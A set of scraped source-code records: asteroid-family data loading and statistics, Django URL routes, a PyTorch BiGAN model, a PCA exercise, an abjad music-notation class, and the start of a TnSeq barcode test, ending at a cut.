#nesvorny_fam.printdir()\n\n        print(\"Asteroid Family size:\", len(members))\n\n        #setting in self:\n        self.mag_fam = dict(zip(members,magnitudes))\n\n        del fam, members, magnitudes\n\n        # Open Asteroid Albedos:\n        #wise_alb = open(sys.path[-1]+\"WISE_MBA_Pass1_2011.dat\", \"r\")\n\n##################################### LOAD CARVANO Classification:\n    def LoadMOC(self):\n        import zipfile\n        from collections import Counter\n\n        '''\n        Load information on each member's observations from the SDSSMOC.\n        '''\n\n        with zipfile.ZipFile(self.paths[-1]+\"SDSSMOC4_ID_V2.zip\", \"r\") as sdss:\n            obs = sdss.open(\"ADR4_ident2.dat\",\"r\")\n\n            look_members = Counter(dict.keys(self.mag_fam))\n\n            sdss_code=dict(); phase=dict()\n\n            for entry in obs:\n                if look_members[entry[244:251].strip()] == 1 or look_members[entry[252:272].strip()] == 1:\n                    phase[entry[:6]] = float(entry[334:339])\n\n                    if entry[244:251].strip() != '0':\n                        sdss_code[entry[:6]] = str(entry[244:251]).strip()\n                    else:\n                        sdss_code[entry[:6]] = str(entry[252:272]).strip()\n\n        look_members = Counter(dict.values(sdss_code))\n\n        # setting in self:\n        self.sdss_code = sdss_code\n        self.phase_fam = phase\n\n##################################### LOAD CARVANO Classification:\n    def LoadTax(self):\n        from collections import Counter\n\n        '''\n        Make a dictionary of members with taxonomic classification by Carvano et al. 
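The loaders in astfam.py all repeat one pattern: open a member of a zip archive and slice fixed-width columns out of each row. A minimal standalone sketch of that pattern (the archive name, member name and column ranges here are hypothetical, not the PDS files above):

import zipfile

def read_fixed_width(archive, member, slices):
    # slices maps a field name to a (start, stop) column range
    rows = []
    with zipfile.ZipFile(archive, "r") as zf:
        with zf.open(member) as handle:
            for raw in handle:
                line = raw.decode("ascii", errors="replace")
                rows.append({name: line[a:b].strip() for name, (a, b) in slices.items()})
    return rows

# e.g. read_fixed_width("families.zip", "families.tab", {"id": (7, 13), "H": (53, 58)})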
(2010).\n '''\n\n carvano = open(self.paths[-2]+\"SDSStax_ast_table.tab\")\n\n look_members = Counter(dict.keys(self.mag_fam))\n\n # Correlate asteroid ID and classification:\n tax_fam = dict()\n for entry in carvano:\n if look_members[entry[:6].strip()] == 1 or look_members[entry[24:35].strip()] == 1:\n if int(entry[:6]) != 0: \n tax_fam[entry[:6].strip()] = entry[36:38].strip()\n else:\n tax_fam[entry[24:35].strip()] = entry[36:38].strip()\n\n print(\"Family Members with SDSS classification:\", len(dict.keys(tax_fam)))\n \n del carvano\n \n # setting in self:\n self.tax_fam = tax_fam\n \n##################################### LOAD WISE Albedos and Diameter\n def LoadWISE(self):\n from numpy import genfromtxt\n from collections import Counter\n from math import isnan\n from packdesig import convert_design\n '''\n Make a dictionary of members with albedo and diameters.\n '''\n wise = map(list,genfromtxt(self.paths[-1]+\"WISE_MBA_Pass1_2011.dat\", dtype=None, skiprows=23))\n \n look_members = Counter(dict.keys(self.mag_fam))\n \n alb_fam = dict(); diam_fam= dict()\n n = 1\n for entry in wise:\n\n try:\n des = convert_design(entry[0].lstrip('0'))\n except IndexError:\n des = entry[0].lstrip('0')\n \n if look_members[des] == 1 and isnan(entry[1]) == False and isnan(entry[5]) == False:\n\n if alb_fam.has_key(des) == True:\n n+=1\n prev = des\n alb_fam[des] = alb_fam.get(des) + float(entry[5])\n diam_fam[des] = diam_fam.get(des) + float(entry[3])\n else:\n try:\n alb_fam[prev] = alb_fam.get(prev)/float(n)\n diam_fam[prev] = diam_fam.get(prev)/float(n)\n #print(prev,alb_fam.get(prev),n)\n except UnboundLocalError:\n pass\n\n alb_fam[des] = round(entry[5], 4)\n diam_fam[des] = round(entry[3], 4)\n\n n = 1\n\n alb_fam[prev] = alb_fam.get(prev)/float(n)\n diam_fam[prev] = diam_fam.get(prev)/float(n)\n\n print(\"Family Members with WISE albedo: \",len(dict.keys(alb_fam)))\n #print(alb_fam)\n del wise, entry\n\n # setting in self:\n self.alb_fam = alb_fam\n self.diam_fam = diam_fam \n\n##################################### Split In taxonomic classification\n def SplitInTax(self,par='magnitude',*taxs):\n from scipy.stats import gaussian_kde\n from collections import deque\n '''\n Split the physical parameters of family members in N groups of taxonomic classification.\n Choose the parameter that will be splitted.\n Choose the taxonomic groups according to Carvano et al. 
(2010).\n '''\n\n if par == 'magnitude': phys_par = self.mag_fam\n if par == 'albedo': phys_par = self.alb_fam\n if par == 'diameter': phys_par = self.diam_fam\n\n tax_fam = self.tax_fam\n alb_fam = self.alb_fam\n\n self.split =[deque() for n in xrange(len(taxs))]\n self.split_gkde =[list() for n in xrange(len(taxs))]\n\n for ast in dict.keys(tax_fam):\n for n, tax in enumerate(taxs):\n if tax_fam[ast] == tax and alb_fam.has_key(ast) == True:\n try:\n self.split[n].append(phys_par[ast])\n except KeyError:\n pass\n\n # gaussian density distribution\n #xmin = min(dict.values(phys_par))\n #xmax = max(dict.values(phys_par))\n for n, tax in enumerate(taxs):\n self.split[n] = list(self.split[n])\n print(tax+'-types: ',len(self.split[n]))\n self.split_gkde[n] = gaussian_kde(self.split[n])\n \n # setting in self:\n self.taxs = taxs\n self.par = par\n\n\n##################################### PLOT DISTRIBUTIONS\n def Plot(self,xmin=10,xmax=20,bins=80,lbl='Vestian'):\n import matplotlib.pyplot as plt\n from numpy import linspace\n \n '''\n Plot frequency distribution of a parameter of n taxonomic groups.\n '''\n\n try:\n self.taxs\n except NameError:\n print('Reload the SplitInTax() attribute.')\n\n x = linspace(xmin,xmax,bins)\n\n plt.figure(1,figsize=(10,8),dpi=70)\n \n [plt.plot(x,dist.evaluate(x),label=lbl+\" \"+self.taxs[n]+\"-types\") for n, dist in enumerate(self.split_gkde)]\n [plt.hist(dist,range=(xmin,xmax),normed=True,histtype='step',label=lbl+\" \"+self.taxs[n]+\"-types\") for n, dist in enumerate(self.split)]\n \n if self.par == 'magnitude': plt.xlabel(\"Absolute Magnitude\")\n if self.par == 'albedo': plt.xlabel(\"Geometric Albedo\")\n if self.par == 'diameter': plt.xlabel(\"Diameter\")\n\n plt.ylabel(\"$f$\")\n plt.legend()\n\n plt.show()\n\n##################################### TWO-SAMPLE KS-TEST\n def KStest2(self,tax1,tax2):\n from scipy.stats import ks_2samp\n \n try:\n self.taxs\n except NameError:\n print('Reload the SplitInTax() attribute.')\n \n n1 = self.taxs.index(tax1)\n n2 = self.taxs.index(tax2)\n \n print('Two-Sample KS test: ',ks_2samp(self.split[n1],self.split[n2]))\n\n##################################### SANITY TEST\n def Sanity(self,tax,per=0.2):\n from scipy.stats import ks_2samp\n import random as rd\n \n '''\n Testing the sanity of the two-sample KS test.\n '''\n \n test=list()\n test.extend(self.split[self.taxs.index(tax)])\n total = len(test)\n \n l=[[],[]]\n \n # Randomly sorting 20% of a previous splitted list.\n for n in [0,1]:\n i=0\n while i <= per*total:\n \n x = rd.choice(test)\n l[n].append(x)\n test.remove(x)\n \n i +=1\n\n print(len(test),len(l[0]),len(l[1]))\n print('Sanity Two-Sample KS test: ',ks_2samp(l[0],l[1]))\n\n\n\n# END\n","sub_path":"astfam.py","file_name":"astfam.py","file_ext":"py","file_size_in_byte":8609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"393099354","text":"from django.conf.urls import url\n\nfrom . 
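The KStest2 and Sanity methods above rest on scipy's two-sample Kolmogorov-Smirnov test; a tiny self-contained check of how ks_2samp separates same- versus shifted-distribution samples (synthetic normals here, not family members):

import numpy as np
from scipy.stats import ks_2samp

rng = np.random.default_rng(0)
a = rng.normal(0.0, 1.0, 500)
b = rng.normal(0.0, 1.0, 500)   # same distribution: large p-value expected
c = rng.normal(0.5, 1.0, 500)   # shifted distribution: small p-value expected

print(ks_2samp(a, b))
print(ks_2samp(a, c))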
import views\n\nurlpatterns = [\n    url(r'^$', views.index, name='index'),  # matches the empty regular expression; ^ anchors the start of the string and $ the end\n    url(r'^topics/', views.topics, name='topics'),\n    url(r'^topic/(?P<topic_id>\\d+)', views.topic, name='topic'),\n    url(r'^content/(?P<entry_id>\\d+)', views.entry_content, name='entry_content'),\n    url(r'^new_topic/', views.new_topic, name='new_topic'),\n    url(r'^new_entry/(?P<topic_id>\\d+)', views.new_entry, name='new_entry'),\n    url(r'^edit_entry/(?P<entry_id>\\d+)', views.edit_entry, name='edit_entry'),\n]","sub_path":"learning_logs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"640501771","text":"import torch\nimport torch.nn as nn\n\n\ndef make_Encoder(input_size, z_dim, channel, nef, n_extra_layer=0):\n    \"\"\"\n    BiGAN Encoder network\n\n    input_size : the image size of the data\n    z_dim : the dimension of the latent space\n    channel : the number of channels of the data\n    nef : the number of filters in encoder\n    \"\"\"\n    assert input_size % 16 == 0, \"input size has to be a multiple of 16\"\n\n    main = nn.Sequential()\n\n    cnef, tisize = nef, 8\n    while tisize != input_size:\n        cnef = cnef // 2\n        tisize = tisize * 2\n\n    main.add_module(\n        \"initial_Conv-{}-{}\".format(channel, cnef),\n        nn.Conv2d(channel, cnef, kernel_size=3, stride=1, padding=1, bias=False),\n    )\n    # the stride of 1 is the default setting of the tf reference code\n    # output size is the same as input_size\n    main.add_module(\"initial_LeakyReLU-{}\".format(cnef), nn.LeakyReLU(0.1, inplace=True))\n    csize = input_size\n\n    while csize > 8:\n        # official kernel_size is 3 but changed to 4\n        main.add_module(\n            \"pyramid_Conv-{}-{}\".format(cnef, cnef * 2),\n            nn.Conv2d(cnef, cnef * 2, kernel_size=4, stride=2, padding=1, bias=False),\n        )\n        main.add_module(\n            \"pyramid_BatchNorm-{}\".format(cnef * 2), nn.BatchNorm2d(cnef * 2)\n        )\n        main.add_module(\n            \"pyramid_LeakyReLU-{}\".format(cnef * 2), nn.LeakyReLU(0.1, inplace=True)\n        )\n        csize = csize // 2\n        cnef = cnef * 2\n\n    for l in range(n_extra_layer):\n        main.add_module(\n            \"extra_Conv-{}-{}\".format(cnef, cnef),\n            nn.Conv2d(cnef, cnef, kernel_size=3, stride=1, padding=1, bias=False),\n        )\n        main.add_module(\"extra_BatchNorm-{}\".format(cnef), nn.BatchNorm2d(cnef))\n        main.add_module(\n            \"extra_LeakyReLU-{}\".format(cnef), nn.LeakyReLU(0.1, inplace=True)\n        )\n\n    main.add_module(\n        \"last_linear-{}-{}\".format(cnef * 8 * 8, z_dim), nn.Linear(cnef * 8 * 8, z_dim),\n    )\n\n    return main\n\n\nclass NetE(nn.Module):\n    \"\"\"\n    the network of the Encoder\n    \"\"\"\n\n    def __init__(self, CONFIG):\n        super(NetE, self).__init__()\n\n        model = make_Encoder(\n            CONFIG.input_size, CONFIG.z_dim, CONFIG.channel, CONFIG.nef\n        )\n        layers = list(model.children())\n\n        self.pyramid = nn.Sequential(*layers[:-1])\n        self.linear = nn.Sequential(layers[-1])\n\n    def forward(self, x, CONFIG):\n        out = self.pyramid(x)\n        out = out.view(-1, CONFIG.nef * 8 * 8)  # flatten to a one-dimensional vector\n        out = self.linear(out)\n\n        return out\n\n\ndef make_Generator(input_size, z_dim, channel, ngf, n_extra_layer=0):\n    \"\"\"\n    BiGAN Generator network\n\n    input_size : the image size of the data\n    z_dim : the dimension of the latent space\n    channel : the number of channels of the image\n    ngf : the number of the Generator's filters\n    \"\"\"\n    assert input_size % 16 == 0, \"input size has to be a multiple of 16\"\n\n    main = nn.Sequential()\n\n    main.add_module(\n        \"initial_Linear-{}-{}\".format(z_dim, 1024), nn.Linear(z_dim, 
1024, bias=False),\n )\n main.add_module(\"initial_BatchNorm-{}\".format(1024), nn.BatchNorm1d(1024))\n main.add_module(\"initial_ReLU-{}\".format(1024), nn.ReLU(inplace=True))\n\n main.add_module(\n \"second_Linear-{}-{}\".format(1024, ngf * 8 * 8),\n nn.Linear(1024, ngf * 8 * 8, bias=False),\n )\n main.add_module(\n \"second_BatchNorm-{}\".format(ngf * 8 * 8), nn.BatchNorm1d(ngf * 8 * 8)\n )\n main.add_module(\"second_ReLU-{}\".format(ngf * 8 * 8), nn.ReLU(inplace=True))\n csize = 8\n cngf = ngf\n\n while csize < input_size // 2:\n main.add_module(\n \"pyramid_Convt-{}-{}\".format(cngf, cngf // 2),\n nn.ConvTranspose2d(\n cngf, cngf // 2, kernel_size=4, stride=2, padding=1, bias=False\n ),\n )\n main.add_module(\n \"pyramid_BatchNorm-{}\".format(cngf // 2), nn.BatchNorm2d(cngf // 2)\n )\n main.add_module(\"pyramid_ReLU-{}\".format(cngf // 2), nn.ReLU(inplace=True))\n cngf = cngf // 2\n csize = csize * 2\n\n for l in range(n_extra_layer):\n main.add_module(\n \"extra_Convt-{}-{}\".format(cngf, cngf),\n nn.ConvTranspose2d(\n cngf, cngf, kernel_size=3, stride=1, padding=1, bias=False\n ),\n )\n main.add_module(\"extra_BatchNorm-{}\".format(cngf), nn.BatchNorm2d(cngf))\n main.add_module(\"extra_ReLU-{}\".format(cngf), nn.ReLU(inplace=True))\n\n main.add_module(\n \"last_Convt-{}-{}\".format(cngf, channel),\n nn.ConvTranspose2d(\n cngf, channel, kernel_size=4, stride=2, padding=1, bias=False\n ),\n )\n main.add_module(\"last_Tanh-{}\".format(channel), nn.Tanh())\n\n return main\n\n\nclass NetG(nn.Module):\n \"\"\"\n the network of Generator\n \"\"\"\n\n def __init__(self, CONFIG):\n super(NetG, self).__init__()\n\n model = make_Generator(\n CONFIG.input_size, CONFIG.z_dim, CONFIG.channel, CONFIG.ngf\n )\n layers = list(model.children())\n\n self.linear = nn.Sequential(*layers[:6])\n self.pyramid = nn.Sequential(*layers[6:])\n\n def forward(self, z, CONFIG):\n out = self.linear(z)\n out = out.view(\n z.shape[0], CONFIG.ngf, 8, 8\n ) # (batch size, channel, height, width)\n out = self.pyramid(out)\n\n return out\n\n\ndef make_Discriminator(input_size, z_dim, channel, ndf, n_extra_layer=0):\n \"\"\"\n BiGAN Discriminator network\n\n input_size : the image size of the data\n z_dim : the dimention of the latent space\n channel : the number of channels of the image\n ndf : the number of Generator's filter\n \"\"\"\n assert input_size % 16 == 0, \"input_size has to be a multiple of 16\"\n\n cndf, tisize = ndf * 2, 16\n while tisize != input_size:\n cndf = cndf // 2\n tisize = tisize * 2\n\n # D(x)\n D_x = nn.Sequential()\n\n D_x.add_module(\n \"initial_Conv-{}-{}\".format(channel, cndf),\n nn.Conv2d(channel, cndf, kernel_size=4, stride=2, padding=1, bias=False),\n )\n D_x.add_module(\"initial_LeakyReLU-{}\".format(cndf), nn.LeakyReLU(0.1, inplace=True))\n D_x.add_module(\"initial_Dropout-{}\".format(cndf), nn.Dropout(inplace=True))\n csize = input_size // 2\n\n while csize > 16:\n D_x.add_module(\n \"pyramid_Conv-{}-{}\".format(cndf, cndf * 2),\n nn.Conv2d(cndf, cndf * 2, kernel_size=4, stride=2, padding=1, bias=False),\n )\n D_x.add_module(\n \"pyramid_LeakyReLU-{}\".format(cndf * 2), nn.LeakyReLU(0.1, inplace=True),\n )\n D_x.add_module(\"pyramid_Dropout-{}\".format(cndf * 2), nn.Dropout(inplace=True))\n csize = csize // 2\n cndf = cndf * 2\n\n for l in range(n_extra_layer):\n D_x.add_module(\n \"extra_Conv-{}-{}\".format(cndf, cndf),\n nn.Conv2d(cndf, cndf, kernel_size=3, stride=1, padding=1, bias=False),\n )\n D_x.add_module(\n \"extra_LeakyReLU-{}\".format(cndf), nn.LeakyReLU(0.1, 
inplace=True)\n )\n D_x.add_module(\"extra_Dropout-{}\".format(cndf), nn.Dropout(inplace=True))\n\n D_x.add_module(\n \"last_Conv-{}-{}\".format(cndf, cndf),\n nn.Conv2d(cndf, cndf, kernel_size=4, stride=2, padding=1, bias=False),\n )\n D_x.add_module(\"last_LeakyReLU-{}\".format(cndf), nn.LeakyReLU(0.1, inplace=True))\n D_x.add_module(\"pyramid_Dropout-{}\".format(cndf), nn.Dropout(inplace=True))\n\n # D(z)\n D_z = nn.Sequential()\n\n D_z.add_module(\"z_Linear\", nn.Linear(z_dim, 512))\n D_z.add_module(\"z_LeakyReLU\", nn.LeakyReLU(0.1, inplace=True))\n D_z.add_module(\"z_Dropout\", nn.Dropout(inplace=True))\n\n # D(x,z)\n D_xz = nn.Sequential()\n D_xz.add_module(\n \"concat_Linear-{}-{}\".format(512 + cndf * 8 * 8, 1024),\n nn.Linear(512 + cndf * 8 * 8, 1024),\n )\n D_xz.add_module(\"concat_LeakyReLU-{}\".format(1024), nn.LeakyReLU(0.1, inplace=True))\n D_xz.add_module(\"concat_Dropout-{}\".format(1024), nn.Dropout(inplace=True))\n D_xz.add_module(\"last_Linear-{}-{}\".format(1024, 1), nn.Linear(1024, 1))\n\n return D_x, D_z, D_xz\n\n\nclass NetD(nn.Module):\n \"\"\"\n the network of Discriminator\n \"\"\"\n\n def __init__(self, CONFIG):\n super(NetD, self).__init__()\n D_x, D_z, D_xz = make_Discriminator(\n CONFIG.input_size, CONFIG.z_dim, CONFIG.channel, CONFIG.ndf\n )\n # D(x)\n layer_x = list(D_x.children())\n self.layer_x = nn.Sequential(*layer_x)\n # D(z)\n layer_z = list(D_z.children())\n self.layer_z = nn.Sequential(*layer_z)\n # D(x,z)\n layer = list(D_xz.children())\n self.feature = nn.Sequential(*layer[:-1])\n self.classifier = nn.Sequential(layer[-1])\n\n def forward(self, x, z, CONFIG):\n x_out = self.layer_x(x)\n x_out = x_out.view(-1, CONFIG.ndf * 8 * 8)\n\n z_out = self.layer_z(z)\n\n y = torch.cat([x_out, z_out], dim=1)\n out = self.feature(y)\n\n feature = out\n feature = feature.view(feature.size()[0], -1)\n\n out = self.classifier(out)\n\n return out, feature\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":9151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"637469289","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 14 10:52:51 2017\n\n@author: ansh\n\"\"\"\n\nfrom __future__ import division\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import preprocessing\nimport tools\n\nfrom scipy.io import loadmat\n\ndata = loadmat(\"/home/ansh/bash4/CourseraMLTutorials/exercise 7/ex7data1.mat\")\n\nX = data['X']\n\nX[:,0] = tools.meanNormalization(X[:,0])\nX[:,1] = tools.meanNormalization(X[:,1])\n\nX[:,0] = tools.featureScaling(X[:,0])\nX[:,1] = tools.featureScaling(X[:,1])\n\n\nm,n = X.shape\n\nsigma = (1/m) * np.matmul(X.T, X)\nU, S, V = np.linalg.svd(sigma)\nk = 1\nU_reduced = U[:, 0:k] #(nxk)\n\nZ = np.matmul(X, U_reduced) # (mxn) x (nxk) = (mxk)\n\nX_approx = np.matmul(Z, U_reduced.T)\n\nplt.figure(1)\nplt.scatter(X[:,0], X[:,1], c = 'b', s = 5)\nplt.scatter(X_approx[:,0], X_approx[:,1], c = 'r', s = 5)\n","sub_path":"exercise 7/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"358256752","text":"# -*- encoding: utf-8 -*-\nimport copy\nfrom abjad.tools import scoretools\nfrom abjad.tools import containertools\nfrom abjad.tools import durationtools\nfrom abjad.tools import iterationtools\nfrom abjad.tools import leaftools\nfrom abjad.tools import measuretools\nfrom abjad.tools import scoretools\nfrom abjad.tools import 
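pca.py above projects onto the top singular vector of the covariance and maps back through U_reduced.T; a compact round-trip check of the same recipe on synthetic correlated data (the sizes, seed and k = 1 are arbitrary choices mirroring the script, not part of the exercise data):

import numpy as np

rng = np.random.default_rng(1)
X = rng.normal(size=(50, 2))
X[:, 1] = 0.9 * X[:, 0] + 0.1 * X[:, 1]   # correlated features
X -= X.mean(axis=0)                       # mean-normalize first

sigma = (X.T @ X) / X.shape[0]
U, S, V = np.linalg.svd(sigma)
U_reduced = U[:, :1]                      # keep k = 1 component
Z = X @ U_reduced                         # project
X_approx = Z @ U_reduced.T                # map back

print("reconstruction error:", np.mean((X - X_approx) ** 2))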
selectiontools\nfrom abjad.tools import timerelationtools\nfrom abjad.tools import timespantools\nfrom abjad.tools import tuplettools\nfrom abjad.tools.mutationtools import inspect\nfrom experimental.tools.musicexpressiontools.CounttimeComponentSelectExpressionSetMethodMixin \\\n import CounttimeComponentSelectExpressionSetMethodMixin\nfrom experimental.tools.musicexpressiontools.SelectExpression \\\n import SelectExpression\n\n\n# TODO: move mixin to rightmost spot in class creation\nclass CounttimeComponentSelectExpression(\n CounttimeComponentSelectExpressionSetMethodMixin, SelectExpression):\n r'''Counttime component select expression.\n\n Preparatory definitions:\n\n ::\n\n >>> score_template = \\\n ... scoretemplatetools.GroupedRhythmicStavesScoreTemplate(\n ... staff_count=4)\n >>> score_specification = \\\n ... musicexpressiontools.ScoreSpecificationInterface(\n ... score_template=score_template)\n >>> red_segment = score_specification.append_segment(name='red')\n\n Example 1. Select voice ``1`` leaves that start during score:\n\n ::\n\n >>> select_expression = score_specification.select_leaves('Voice 1')\n\n ::\n\n >>> print select_expression.storage_format\n musicexpressiontools.CounttimeComponentSelectExpression(\n classes=musicexpressiontools.ClassInventory([\n leaftools.Leaf\n ]),\n voice_name='Voice 1'\n )\n\n Example 2. Select voice ``1`` leaves that start during segment ``'red'``:\n\n ::\n\n >>> select_expression = red_segment.select_leaves('Voice 1')\n\n ::\n\n >>> print select_expression.storage_format\n musicexpressiontools.CounttimeComponentSelectExpression(\n anchor='red',\n classes=musicexpressiontools.ClassInventory([\n leaftools.Leaf\n ]),\n voice_name='Voice 1'\n )\n\n Counttime component select expressions are immutable.\n '''\n\n ### INITIALIZER ###\n\n def __init__(\n self, \n anchor=None, \n classes=None, \n voice_name=None, \n time_relation=None, \n callbacks=None,\n ):\n from experimental.tools import musicexpressiontools\n assert classes is None or \\\n self._is_counttime_component_class_expr(classes), repr(classes)\n SelectExpression.__init__(\n self,\n anchor=anchor,\n voice_name=voice_name,\n time_relation=time_relation,\n callbacks=callbacks,\n )\n CounttimeComponentSelectExpressionSetMethodMixin.__init__(self)\n if isinstance(classes, tuple):\n classes = musicexpressiontools.ClassInventory(classes)\n self._classes = classes\n\n ### SPECIAL METHODS ###\n\n def __add__(self, select_expression):\n from experimental.tools import musicexpressiontools\n assert isinstance(select_expression, type(self))\n assert self.score_specification is \\\n select_expression.score_specification\n select_expression_inventory = \\\n musicexpressiontools.SelectExpressionInventory()\n select_expression_inventory.extend(\n [copy.deepcopy(self), copy.deepcopy(select_expression)])\n select_expression_inventory._score_specification = \\\n self.score_specification\n return select_expression_inventory\n\n ### PRIVATE METHODS ###\n\n def _is_counttime_component_class_expr(self, expr):\n from experimental.tools import musicexpressiontools\n if isinstance(expr, tuple) and all(\n self._is_counttime_component_class_expr(x) for x in expr):\n return True\n elif isinstance(expr, musicexpressiontools.ClassInventory):\n return True\n elif issubclass(expr, (\n measuretools.Measure, tuplettools.Tuplet, leaftools.Leaf)):\n return True\n elif expr == containertools.Container:\n return True\n else:\n return False\n\n ### PUBLIC PROPERTIES ###\n\n @property\n def classes(self):\n r'''Counttime 
component select expression classes.\n\n Returns class inventory or none.\n '''\n return self._classes\n\n ### PUBLIC METHODS ###\n\n def evaluate(self):\n r'''Evaluate counttime component select expression.\n\n Returns none when nonevaluable.\n\n Returns start-positioned rhythm payload expression when evaluable.\n '''\n from experimental.tools import musicexpressiontools\n anchor_timespan = self._evaluate_anchor_timespan()\n voice_proxy = \\\n self.score_specification.voice_data_structures_by_voice[\n self.voice_name]\n rhythm_payload_expressions = \\\n voice_proxy.payload_expressions_by_attribute['rhythm']\n # TODO: will this have to be optimized with bisect?\n rhythm_payload_expressions = \\\n rhythm_payload_expressions.get_timespans_that_satisfy_time_relation(\n timerelationtools.timespan_2_intersects_timespan_1(\n timespan_1=anchor_timespan))\n if not rhythm_payload_expressions:\n return\n rhythm_payload_expressions = \\\n copy.deepcopy(rhythm_payload_expressions)\n rhythm_payload_expressions = \\\n timespantools.TimespanInventory(rhythm_payload_expressions)\n rhythm_payload_expressions.sort()\n assert anchor_timespan.is_well_formed, repr(anchor_timespan)\n rhythm_payload_expressions &= anchor_timespan\n expression = \\\n musicexpressiontools.StartPositionedRhythmPayloadExpression(\n start_offset=anchor_timespan.start_offset)\n for rhythm_payload_expression in rhythm_payload_expressions:\n expression.payload.extend(rhythm_payload_expression.payload)\n assert inspect(expression.payload).is_well_formed()\n # TODO: eventually make this be able to work\n #callback_cache = self.score_specification.interpreter.callback_cache\n #expression = expression.get_elements_that_satisfy_time_relation(\n # time_relation, callback_cache)\n expression = self._apply_callbacks(expression)\n expression._voice_name = self.voice_name\n return expression\n\n def evaluate_against_score(self, score):\n r'''Evaluate counttime component select expression against `score`.\n\n Returns iterable payload expression.\n '''\n from experimental.tools import musicexpressiontools\n assert isinstance(score, scoretools.Score), repr(score)\n voice = score[self.voice_name]\n anchor_timespan = self._evaluate_anchor_timespan()\n # list signals the result of a call to map_to_each()\n if isinstance(anchor_timespan, list):\n is_map_to_each = True\n else:\n is_map_to_each = False\n anchor_timespan = [anchor_timespan]\n result = []\n anchor_timespans = anchor_timespan\n for anchor_timespan in anchor_timespans:\n time_relation = self._get_time_relation(anchor_timespan)\n voice_proxy = \\\n self.score_specification.voice_data_structures_by_voice[\n self.voice_name]\n start, stop = time_relation.get_offset_indices(\n voice_proxy.leaf_start_offsets, voice_proxy.leaf_stop_offsets)\n components = voice_proxy.leaves[start:stop]\n if not components:\n continue\n expression = \\\n musicexpressiontools.IterablePayloadExpression(components)\n expression = self._apply_callbacks(expression)\n result.append(expression)\n if is_map_to_each:\n return result\n else:\n expression = result[0]\n return expression\n","sub_path":"abjad/experimental/tools/musicexpressiontools/CounttimeComponentSelectExpression.py","file_name":"CounttimeComponentSelectExpression.py","file_ext":"py","file_size_in_byte":8148,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"15050064","text":"import random\nfrom collections import Counter\nfrom Bio import SeqIO\nfrom tnseq import sequence\nfrom tnseq import tnseq\nfrom 
tnseq import extract_barcodes\nfrom tnseq import quantify_barcodes\nimport json\nimport subprocess\nimport shlex\n\n\ndef test_quantify_load_fq_barcodes():\n in_fq_file = \"/nfs/home/ansintsova/TNSEQ_DEV/code/package/tests/data/seqData/test100.fasta\"\n cnter = quantify_barcodes.quantify_load_fq_barcodes(in_fq_file)\n expectedCounter = Counter({'ATTGTTCTATGCCTGCC': 2, 'ATCCATCAAGCAAACGC': 2, 'CGAAAAGATATACCAAT': 2, 'TCGCGATGTAATATATA': 2,\n 'GTCACGCGCCCGCGCCA': 1, 'AGACCGATGCGTCAAGG': 1, 'GAAAGCCCGAGATCGAT': 1, 'TCGCCGAGCGATTTTTA': 1,\n 'AGGAAACCAAATATAAA': 1, 'TGCAAAGTGAGGGCTAC': 1, 'AGAGCACACGACCGGTG': 1, 'TACATCGCTAGTGAACT': 1,\n 'GTGCGCTATGCAACGAC': 1, 'TGGCACGAAAGCAAGAT': 1, 'CTGCATATCTAGCGCGG': 1, 'CCAAGAGCACGAGACCA': 1,\n 'GCGGTTCGGAGAGACAG': 1, 'ACGGATCCGACCCGGGG': 1, 'TGGAAACCCTATCGCTA': 1, 'AGATGCTCGCGTGCGGT': 1,\n 'CACATTGGAGTCTACTG': 1, 'CGCAATGGGGCGTGGGG': 1, 'CTCCCAGCTTATCAGAG': 1, 'GACCAATACGCGGGGAG': 1,\n 'CCGTCTGGCTGAGACTG': 1, 'TCATTAAAGGCTTGGTG': 1, 'ATAAGCTTTAATAGTTA': 1, 'AGGAGTAGCCGAGTGCT': 1,\n 'AGTATGCAGACATGTGT': 1, 'TAAGGACGCTACCGTAC': 1, 'GCAAAGTAATCACAGAG': 1, 'CAATATCATCCTCGACT': 1,\n 'CCCCAAGGCTGCATCCA': 1, 'CTTTATACGCGAACTCG': 1, 'TCGCGCCTAGAGCTATG': 1, 'GCGCACGACGGTACGCC': 1,\n 'CAAAAATGATCGCGTAG': 1, 'ACGAAGACCAGCTATGG': 1, 'GATTTCAGACTACCTGC': 1, 'GAGGGTGATTCACGACT': 1,\n 'CATAAGCAGGCCAACAG': 1, 'CGACTTGTAGATCTCTG': 1, 'GATGGGCCTGAGGCAGA': 1, 'TAATGGATGAATTTGTG': 1,\n 'AGCCCAGCATACAGAGA': 1, 'CCCCATGACAGCGTTAT': 1, 'TTCCCAGCAAAATACGG': 1, 'GCCTCCACACGAGTACA': 1,\n 'CGTTATGTACATGTTCC': 1, 'CCATCGCCTGTAACGAT': 1, 'GTAACGCTGAACAAAAA': 1, 'AAAACCTCCCTGCCCAT': 1,\n 'TTGAAGACGGTACCTGT': 1, 'CGACCATTGGTAGACAC': 1, 'GCCGTAATCCTTAGAAG': 1, 'TCAGAGCGTATTCATCC': 1,\n 'TATCAGCGCGCGACTTA': 1, 'GAATTTCAGCTGGCAAG': 1, 'CAAACCTGATTAAATCA': 1, 'CATAGCTCTTGTTACAC': 1,\n 'GCGAACTTTATGGCAGA': 1, 'AGTACGGGTACAATGCG': 1, 'CGATCACCCTCAGTATG': 1, 'CACGTATCCTCGTGGAC': 1,\n 'AGGGTACACGCAGCGCG': 1, 'GAGGCCATGGGCAGTCC': 1, 'GCGGTGACAGGATCGGA': 1, 'CCTGAAAACCTTCACTC': 1,\n 'ACGCGCCAGACTTACGC': 1, 'ATGGCGCCTTCCGACGT': 1, 'TCCTTTAGGGGCGAATG': 1, 'AGACACTCCATTTAAAG': 1,\n 'CTCCCAAACACGAGAAT': 1, 'TTACGAGCTCATGAGCA': 1, 'GGTGGCACCTATAACAA': 1, 'CTCAAGGCCCGACGGGC': 1,\n 'TATTAAGGTAATGTAGA': 1, 